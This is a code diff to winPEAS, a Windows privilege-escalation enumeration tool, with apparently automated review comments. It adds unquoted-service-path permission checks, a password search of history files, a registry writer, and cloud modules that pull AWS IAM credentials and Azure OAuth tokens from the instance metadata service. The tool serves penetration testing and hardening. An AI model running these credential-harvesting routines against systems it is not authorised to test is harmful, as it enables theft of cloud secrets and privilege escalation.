Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
index ce11f8d..8cbc17e 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
@@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------|
+ | {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------|
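Review bot: The added banner row is labelled `Get the latest version` but links to the GitHub Sponsors page, so either the label or the URL is wrong; the other rows pair a label with a matching destination. Either change the label to something like `Sponsor the project` or point the row at a releases link. This is a user-facing string, so it is worth settling before release.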
@@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
+ Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
+ Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
+ $" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
+ $" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
+ $" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
+ $" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
}
@@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value;
string key = entry.Key;
- string line = "";
-
+ string line;
if (!no_gray)
{
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
index a905c08..c183446 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
@@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath;
}
+ public static bool CheckQuoteAndSpaceWithPermissions(string path, out List injectablePaths)
+ {
+ List result = new List();
+ bool isInjectable = false;
+
+ if (!path.Contains('"') && !path.Contains("'"))
+ {
+ if (path.Contains(" "))
+ {
+ string currentPath = string.Empty;
+ foreach (var pathPart in Regex.Split(path, @"\s"))
+ {
+ currentPath += pathPart + " ";
+
+ if (File.Exists(currentPath) || Directory.Exists(currentPath))
+ {
+ var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
+
+ if (permissions.Any())
+ {
+ result.Add(currentPath);
+ isInjectable = true;
+ }
+ }
+ else
+ {
+ var firstPathPart = currentPath;
+ DirectoryInfo di = new DirectoryInfo(firstPathPart);
+ var exploitablePath = di.Parent.FullName;
+ var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
+
+ if (folderPermissions.Any())
+ {
+ result.Add(exploitablePath);
+ isInjectable = true;
+ };
+ }
+ }
+ }
+ }
+
+ injectablePaths = result.Select(i => i).Distinct().ToList();
+ return isInjectable;
+ }
+
public static bool CheckQuoteAndSpace(string path)
{
if (!path.Contains('"') && !path.Contains("'"))
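Review bot: `di.Parent.FullName` dereferences `Parent` without a null check; when the accumulated segment resolves to a drive root `DirectoryInfo.Parent` is null and the call throws NullReferenceException, which the callers in AutoRuns.cs catch broadly and so silently drop the whole entry. Guard it with `var parentDir = di.Parent; if (parentDir is null) continue;` before taking `FullName`. Smaller points: `result.Select(i => i).Distinct().ToList()` has a redundant `Select`, there is a stray `;` after the inner `if` block's closing brace, and `currentPath` always carries a trailing space when passed to File.Exists/Directory.Exists and the permission helpers, which is harmless only if path normalisation trims it and deserves a comment stating that assumption. CheckQuoteAndSpace at the end of the hunk continues outside it.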
diff --git a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
index 51f0d15..7e76194 100644
--- a/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
@@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
+ public static bool WriteRegValue(string hive, string path, string keyName, string value)
+ {
+ try
+ {
+ RegistryKey regKey;
+ if (hive == "HKCU")
+ {
+ regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
+ }
+ else if (hive == "HKU")
+ {
+ regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
+
+ }
+ else
+ {
+ regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
+ }
+
+ if (regKey == null)
+ {
+ return false;
+ }
+
+ regKey.SetValue(keyName, value, RegistryValueKind.String);
+ }
+ catch (Exception ex)
+ {
+ return false;
+ }
+
+ return true;
+ }
+
public static string GetRegValue(string hive, string path, string value)
{
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU)
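Review bot: `OpenSubKey(path)` with one argument opens the key read-only, so `regKey.SetValue(...)` throws UnauthorizedAccessException and WriteRegValue returns false on every call; each of the three calls needs the writable overload, e.g. `regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path, writable: true);`. The opened key is also never disposed (wrap it in a `using` block) and the caught `ex` is unused. No caller of this writer appears in the diff, and the rest of the helper only reads; a doc comment naming which check needs to modify the registry and why would help reviewers of a tool that is otherwise enumeration-only.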
diff --git a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
index d064d7d..cd106a2 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
@@ -5,8 +5,10 @@ using System.IO;
using System.Linq;
using System.Management;
using System.Text.RegularExpressions;
+using winPEAS.Checks;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;
+using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo
{
@@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{
}
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
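Review bot: `var injectablePaths = new List();` allocates a list that the `out` parameter immediately overwrites; `MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out var injectablePaths)` is the idiomatic form. The same pre-initialised `out` pattern is repeated at the `orig_filepath`, `filepath`, `folder` and `command` call sites in the later hunks of this file. The enclosing method starts and ends outside the hunk.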
@@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", autorunLocation[0] + "\\" + reg},
@@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName;
+ var config = YamlConfigHelper.GetWindowsSearchConfig();
+ var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
+ // add .* around each element to match the whole line
+ var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
+ pwdInsideHistory = string.Join("|", items);
+
try
{
if (Directory.Exists(usersPath))
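Review bot: `config.variables.FirstOrDefault(...)` returns null when no `pwd_inside_history` variable exists in the YAML, and `.value` then throws NullReferenceException before the `try` on the following line; a guard such as `var pwdVar = config.variables.FirstOrDefault(...); if (pwdVar is null || string.IsNullOrEmpty(pwdVar.value)) { /* skip the content search */ }` keeps the autorun listing working without that config entry. Whether `variables` or `value` can themselves be null is not visible here. The enclosing method starts and ends outside the hunk.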
@@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files)
{
+ var fileContent = File.ReadAllText(filepath);
+ var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
+ // remove all non-printable and control characters
+ sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
+
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
+
string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary() {
{ "Reg", "" },
@@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
+ { "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
});
}
}
@@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{
try
{
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
+
results.Add(new Dictionary() {
{ "Reg", "" },
{ "RegKey", "" },
@@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try
{
string folder = Path.GetDirectoryName(filepathCleaned);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
+
results.Add(new Dictionary()
{
{"Reg", ""},
@@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
},
- {"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()}
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path))
{
string folder = Path.GetDirectoryName(path);
+ var injectablePaths = new List();
+ var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary
{
@@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
- { "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
+ {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs
new file mode 100644
index 0000000..71e7bc1
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs
@@ -0,0 +1,201 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class AWSInfo : CloudInfoBase
+ {
+ /*
+ * notes - possible identification:
+ *
+ - "c:\Program Files\Amazon\EC2Launch"
+ - "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
+ - "c:\Program Files (x86)\AWS SDK for .NET"
+ - get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
+ */
+
+ const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
+ const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
+ const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
+
+
+ public override string Name => "AWS EC2";
+
+ private Dictionary> _endpointData = null;
+
+ public override bool IsCloud => Directory.Exists(AWS_FOLDER);
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+
+ try
+ {
+ if (IsAvailable)
+ {
+ string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
+
+ _endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
+ _endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
+ _endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
+ _endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
+ _endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
+ _endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
+
+ /*
+ * print_3title "SSM Runnig"
+ ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
+ *
+ */
+ }
+ else
+ {
+ _endpointData.Add("General Info", new List()
+ {
+ new EndpointData()
+ {
+ EndpointName = "",
+ Data = null,
+ IsAttackVector = false
+ }
+ });
+ }
+ }
+ catch (Exception ex)
+ {
+ Beaprint.PrintException(ex.Message);
+ }
+ }
+
+ return _endpointData;
+ }
+
+ private List GetSecurityCredentialsMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetUserDataMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("user-data", "latest/user-data", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetIAMRoleMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>
+ {
+ new Tuple("iam/info", "iam/info", false)
+ };
+
+ var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
+ var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+
+ foreach (var role in roles.Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple(role, $"iam/security-credentials/{role}", false));
+ }
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetNetworkMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>();
+
+ var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
+ var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+ var urlBase = "network/interfaces/macs";
+
+ foreach (var mac in macs.Split('\n'))
+ {
+ metadataEndpoints.Add(new Tuple("Owner ID", $"{urlBase}/{mac}/owner-id", false));
+ metadataEndpoints.Add(new Tuple("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
+ metadataEndpoints.Add(new Tuple("Security Groups", $"{urlBase}/{mac}/security-groups", false));
+ metadataEndpoints.Add(new Tuple("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
+ metadataEndpoints.Add(new Tuple("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
+ metadataEndpoints.Add(new Tuple("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
+ metadataEndpoints.Add(new Tuple("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
+ metadataEndpoints.Add(new Tuple("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
+ }
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetAccountMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("account info", "identity-credentials/ec2/info", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetGeneralMetadataInfo(string apiToken)
+ {
+ var metadataEndpoints = new List>()
+ {
+ new Tuple("ami id", "ami-id", false),
+ new Tuple("instance action","instance-action", false),
+ new Tuple("instance id","instance-id", false),
+ new Tuple("instance life-cycle","instance-life-cycle", false),
+ new Tuple("instance type","instance-type", false),
+ new Tuple("placement/region","placement/region", false),
+ };
+
+ var result = GetMetadataInfo(metadataEndpoints, apiToken);
+
+ return result;
+ }
+
+ private List GetMetadataInfo(List> endpointData, string apiToken)
+ {
+ List _endpointDataList = new List();
+
+ foreach (var tuple in endpointData)
+ {
+ string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
+
+ var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result,
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+ return _endpointDataList;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
+ }
+ }
+}
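Review bot: The `user-data` entry in `GetUserDataMetadataInfo` passes `latest/user-data` through `GetMetadataInfo`, which always prefixes `METADATA_URL_BASE` (`.../latest/meta-data`), so the request goes to `/latest/meta-data/latest/user-data`, a path that does not exist; user data is served at `/latest/user-data`, one level above the meta-data tree, so this entry needs its own request against that URL rather than the shared helper. In `GetIAMRoleMetadataInfo` and `GetNetworkMetadataInfo`, `roles.Split('\n')` and `macs.Split('\n')` dereference a null when `CreateMetadataAPIRequest` returns null on a socket error, and an empty listing produces one entry whose role or mac is the empty string; guard with `foreach (var role in (roles ?? string.Empty).Split('\n').Where(r => r.Length > 0))` (needs `using System.Linq;`). Every entry here is created with `IsAttackVector = false` while `AzureInfo` sets it to `true` for its token endpoints; the two files should agree on what the flag means, and a one-line comment on `EndpointData.IsAttackVector` would settle it.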
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs
new file mode 100644
index 0000000..e37f19f
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs
@@ -0,0 +1,88 @@
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class AzureInfo : CloudInfoBase
+ {
+ public override string Name => "Azure VM";
+ public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
+
+ private Dictionary> _endpointData = null;
+
+ const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
+ const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
+ const string API_VERSION = "2021-12-13";
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+ List _endpointDataList = new List();
+
+ try
+ {
+ string result;
+
+ List> endpoints = new List>()
+ {
+ new Tuple("Instance Details", $"instance?api-version={API_VERSION}", false),
+ new Tuple("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
+ new Tuple("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
+ new Tuple("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
+ new Tuple("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
+ new Tuple("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
+ };
+
+ if (IsAvailable)
+ {
+
+
+ foreach (var tuple in endpoints)
+ {
+ string url = $"{AZURE_BASE_URL}{tuple.Item2}";
+
+ result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
+
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = tuple.Item1,
+ Data = result,
+ IsAttackVector = tuple.Item3
+ });
+ }
+
+
+ }
+ else
+ {
+ foreach (var endpoint in endpoints)
+ {
+ _endpointDataList.Add(new EndpointData()
+ {
+ EndpointName = endpoint.Item1,
+ Data = null,
+ IsAttackVector = false
+ });
+ }
+ }
+
+ _endpointData.Add("General", _endpointDataList);
+ }
+ catch (Exception ex)
+ {
+ }
+ }
+
+ return _endpointData;
+ }
+
+ public override bool TestConnection()
+ {
+ return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
+ }
+ }
+}
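Review bot: `catch (Exception ex) { }` at the end of `EndpointDataList` silently discards every failure, so a malformed URL or a reader error leaves `_endpointData` with no entries and no trace, whereas `AWSInfo` and `GCPInfo` report through `Beaprint.PrintException(ex.Message)`; do the same here (the file will need `using winPEAS.Helpers;`). Because `_endpointData` is assigned before the `try`, a failed first attempt is cached and never retried; that may be intended but deserves a comment. The `string result;` declared above the `endpoints` list is only used inside the `IsAvailable` loop and can be declared there, and the blank lines around that `foreach` look like leftover edits.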
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs
new file mode 100644
index 0000000..6827f08
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs
@@ -0,0 +1,77 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System.Net.Sockets;
+using System.Text;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal abstract class CloudInfoBase
+ {
+ public abstract string Name { get; }
+
+ public abstract bool IsCloud { get; }
+
+ public abstract Dictionary> EndpointDataList();
+
+ public abstract bool TestConnection();
+
+ private bool? _isAvailable;
+ public bool IsAvailable
+ {
+ get
+ {
+ if (_isAvailable == null)
+ {
+ _isAvailable = TestConnection();
+ }
+
+ return _isAvailable.Value;
+ }
+ }
+
+ protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
+ {
+ try
+ {
+ var request = WebRequest.CreateHttp(url);
+
+ if (headers != null)
+ {
+ request.Headers = headers;
+ }
+
+ request.Method = method;
+
+ using (var response = (HttpWebResponse)request.GetResponse())
+ {
+ using (var responseStream = response.GetResponseStream())
+ {
+ // Get a reader capable of reading the response stream
+ using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
+ {
+ // Read stream content as string
+ var content = myStreamReader.ReadToEnd();
+
+ return content;
+ }
+ }
+ }
+ }
+ catch (WebException exception)
+ {
+ if (exception.InnerException != null)
+ {
+ return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
+ }
+ }
+ catch (Exception ex)
+ {
+ return string.Empty;
+ }
+
+ return string.Empty;
+ }
+ }
+}
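Review bot: `CreateMetadataAPIRequest` never sets `request.Timeout`, so on a host where 169.254.169.254 is routed but does not answer, each call blocks for the `HttpWebRequest` default of 100 s and the cloud checks can stall the whole run for minutes; set a short deadline, e.g. `request.Timeout = 3000; request.ReadWriteTimeout = 3000;` (values are a suggestion). The `WebException` branch returns `string.Empty` for any non-socket failure, including HTTP 4xx/5xx, which callers cannot distinguish from an endpoint that legitimately returned an empty body, and the broad `catch (Exception ex)` discards `ex`; at minimum print the message, and the type test reads better as `exception.InnerException is SocketException ? null : string.Empty`. Since `IsAvailable` caches the first `TestConnection` result, one timeout during that probe marks the provider unavailable for the rest of the run; worth a comment on `_isAvailable`.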
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs
new file mode 100644
index 0000000..427486b
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs
@@ -0,0 +1,10 @@
+namespace winPEAS.Info.CloudInfo
+{
+ internal class EndpointData
+ {
+ public string EndpointName { get; set; }
+ public string Data { get; set; }
+
+ public bool IsAttackVector { get; set; }
+ }
+}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs
new file mode 100644
index 0000000..d393b57
--- /dev/null
+++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs
@@ -0,0 +1,208 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using winPEAS.Helpers;
+
+namespace winPEAS.Info.CloudInfo
+{
+ internal class GCPInfo : CloudInfoBase
+ {
+ public override string Name => "Google Cloud Platform";
+
+ const string GCP_BASE_URL = "http://{URL_BASE}/";
+ const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
+
+ /*
+ C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
+ C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
+ c:\Program Files (x86)\Google\Cloud SDK"
+ http://metadata.google.internal
+ */
+
+ public override bool IsCloud => Directory.Exists(GCP_FOLDER);
+
+ private Dictionary> _endpointData = null;
+
+ const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
+
+
+ public override Dictionary> EndpointDataList()
+ {
+ if (_endpointData == null)
+ {
+ _endpointData = new Dictionary>();
+
+ try
+ {
+ if (IsAvailable)
+ {
+ _endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
+ _endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
+ _endpointData.Add("Instance Info", GetInstanceMetadataInfo());
+ _endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
+ _endpointData.Add("User Data", GetUserMetadataInfo());
+ _endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
+ }
+ else
+ {
+ _endpointData.Add("General Info", new List()
+ {
+ new EndpointData()
+ {
+ EndpointName = "",
+ Data = null,
+ IsAttackVector = false
+ }
+ });
+ }
+ }
+ catch (Exception ex)
+ {
+ Beaprint.PrintException(ex.Message);
+ }
+ }
+
+ return _endpointData;
+ }
+
+ private List GetServiceAccountsMetadataInfo()
+ {
+ var metadataEndpoints = new List>();
+
+ var serviceAccountsEndpointUrlBase = "instance/service-accounts";
+ var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
